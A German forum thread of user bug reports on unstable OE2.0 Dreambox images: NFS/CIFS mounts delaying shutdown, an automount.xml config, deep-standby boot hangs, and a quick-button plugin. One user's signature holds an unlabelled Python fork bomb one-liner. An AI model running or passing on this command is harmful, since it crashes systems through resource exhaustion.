Feedback/Bugs in unstable images DM8000/DM7020HD/DM800se/DM800/DM500HD OE2.0

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Hallo

    Gibt es für das 2.0 schon das Plugin Multi Quickbutton,wenn ja wo finde ich das ?
    Gruß Rabevater

    Dreambox HD8000ss
    Newnigma2 aktuelles unstable OE2.0 alpha
    Skin dreamTV-HD
  • Also ich habe selber 2 NFS Freigaben gemountet und hier steht die Box nicht 6min beim herunterfahren.

    Also ohne Log fällt mir da spontan nichts ein aber du kannst die Freigaben mal testweise deaktivieren.
  • Originally posted by sparksofinsanity
    Also ich habe selber 2 NFS Freigaben gemountet und hier steht die Box nicht 6min beim herunterfahren.

    Also ohne Log fällt mir da spontan nichts ein aber du kannst die Freigaben mal testweise deaktivieren.

    *zustimm*
    Ich hab 2 nfs und 2 cifs freigaben alles geht wunderbar und normale reboots keine 6 oder gar 8min.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • passt!!

    habe die Freigaben deaktiviert und schon startet die Box "normal".

    hatte allerdings ne CIFS freigabe....

    ich hatte die automount.xml vom oe 1.6 genommen. beißt die sich mit dem neuen oe 2.0?

    mal ne blöde frage: die automount.xml kommt doch nach etc\enigma2 oder?

    ist daran was faul ???

    <cifs>
    <mount>
    <active>True</active>
    <hdd_replacement>False</hdd_replacement>
    <ip>192.168.xxx.xx</ip>
    <sharename>Filme</sharename>
    <sharedir>\video\Filme</sharedir>
    <options>rw</options>
    <username>DM8000</username>
    <password>xxxxx</password>
    </mount>
    </cifs>

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von fairfexx ()

  • Originally posted by Rabevater
    Hallo

    Gibt es für das 2.0 schon das Plugin Multi Quickbutton,wenn ja wo finde ich das ?

    Ich verwende auf dm8000 das plugin 'MQB - vu' Es lassen sich fast alle tasten einstellen, und es kann sogar makros.

    (bei mir auf oe2, pli und nn2)
    Bilder
    • mqbvu_NN0.jpg

      124,42 kB, 1.280×720, 3.985 mal angesehen
    • mqbvu_NN1.jpg

      143,2 kB, 1.280×720, 3.949 mal angesehen
  • Original von uhzv7de6f9
    Originally posted by Rabevater
    Hallo

    Gibt es für das 2.0 schon das Plugin Multi Quickbutton,wenn ja wo finde ich das ?

    Ich verwende auf dm8000 das plugin 'MQB - vu' Es lassen sich fast alle tasten einstellen, und es kann sogar makros.

    (bei mir auf oe2, pli und nn2)


    Danke, ich habe das hier gefunden:
    enigma2-plugin-extensions-multiquickbutt on-vu_2.7.11-r2_mipsel.ipk.

    Ich müsste mich aber dafür extra anmelden- will ich aber nicht.
    Hast du ein Download? (vielleicht per PN)
    Gruß Rabevater

    Dreambox HD8000ss
    Newnigma2 aktuelles unstable OE2.0 alpha
    Skin dreamTV-HD
  • Vielen Dank,aber nach der Installation finde ich den gar nicht.
    Werde Morgen noch mal alles Neu machen.
    Das bei mir manches nicht klappt hat bestimmt mit dem Einspielen meiner alten Settings zu tun.
    Gruß Rabevater

    Dreambox HD8000ss
    Newnigma2 aktuelles unstable OE2.0 alpha
    Skin dreamTV-HD
  • Ich hab hin und wieder auch Probleme beim Booten aus dem Deepstandby. Ist mir gestern schon aufgefallen, und heute auch wieder.

    Wenn die Box länger im Deepstandby ist, hängt sie beim Booten ("Please wait"). 8 Minuten habe ich noch nicht gewartet, hab nach etwa 5 Minuten den Stecker gezogen. Beim nächsten Mal fährt die Box dann normal hoch.

    Eine CIF-Freigabe habe ich nicht eingerichtet. Auch keine zusätzlichen Plugins, nur das KerniHD R2 Skin ist aktiv.
  • Ohne Log bringt das überhaupt nichts.
    Das kann zig verschiedene Ursachen haben, da reicht es manchmal schon wenn eine Smartcard gesteckt ist oder eine Softcam gestartet wird.